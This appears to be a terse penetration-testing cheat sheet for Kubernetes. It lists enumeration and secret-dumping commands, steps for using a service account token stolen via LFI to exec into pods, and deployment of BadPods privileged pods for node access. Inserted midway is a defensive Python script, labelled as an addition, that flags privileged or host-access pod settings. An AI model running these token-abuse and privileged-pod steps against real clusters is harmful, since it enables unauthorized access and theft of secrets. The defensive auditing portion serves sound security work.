- Get pods, for all namespaces
kubectl auth can-i --list
kubectl get secrets
kubectl get nodes
kubectl get deployments
kubectl get services
kubectl get ingress
kubectl get jobs
- Intel about a secret, and output
kubectl describe secrets <secret>
kubectl get secret <secret> -o json
Abuse Token
- Inside a pod, the service account token (JWT) can be found under
- By chance of an LFI, extract the token and
kubectl auth can-i --list --token=$TOKEN
kubectl get pods --token=$TOKEN
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
Create Pods
- Use BishopFox's BadPods
- If there is no internet connection add
imagePullPolicy: IfNotPresent
to the YAML file
kubectl apply -f pod.yml --token=$TOKEN
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
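
A defender-side check for the pod settings that BadPods-style manifests rely on, written as an added example that is not part of the original notes or of BishopFox's repository. It reads the JSON shape produced by `kubectl get pods -A -o json`; the sample pod list is constructed and the function names are hypothetical.

```python
import json

# Constructed sample in the shape of `kubectl get pods -A -o json` (not real cluster data).
SAMPLE = json.loads("""
{"items": [
  {"metadata": {"namespace": "default", "name": "everything-allowed-exec-pod"},
   "spec": {"hostNetwork": true, "hostPID": true, "hostIPC": true,
            "volumes": [{"name": "noderoot", "hostPath": {"path": "/"}}],
            "containers": [{"name": "c", "securityContext": {"privileged": true}}]}},
  {"metadata": {"namespace": "web", "name": "frontend"},
   "spec": {"containers": [{"name": "nginx", "image": "nginx"}]}}
]}
""")

HOST_FLAGS = ("hostNetwork", "hostPID", "hostIPC")
RISKY_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "NET_ADMIN"}


def pod_findings(pod):
    """Return the node-access settings present in one pod object."""
    spec = pod.get("spec", {})
    found = [flag for flag in HOST_FLAGS if spec.get(flag) is True]
    for vol in spec.get("volumes") or []:
        if "hostPath" in vol:
            found.append("hostPath:" + vol["hostPath"].get("path", "?"))
    containers = (spec.get("containers") or []) + (spec.get("initContainers") or [])
    for c in containers:
        sc = c.get("securityContext") or {}
        if sc.get("privileged") is True:
            found.append("privileged:" + c["name"])
        caps = set((sc.get("capabilities") or {}).get("add") or [])
        found += ["cap:%s:%s" % (cap, c["name"]) for cap in sorted(caps & RISKY_CAPS)]
    return found


def audit(pod_list):
    """Map 'namespace/name' to findings for every pod that has any."""
    report = {}
    for pod in pod_list.get("items", []):
        hits = pod_findings(pod)
        if hits:
            meta = pod["metadata"]
            report[meta["namespace"] + "/" + meta["name"]] = hits
    return report


if __name__ == "__main__":
    for name, hits in audit(SAMPLE).items():
        print(name, ", ".join(hits))
```

To run it against a cluster, replace `SAMPLE` with the parsed output of `kubectl get pods -A -o json`.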
Start Pods
kubectl exec -it <podname> -n <namespace> -- /bin/bash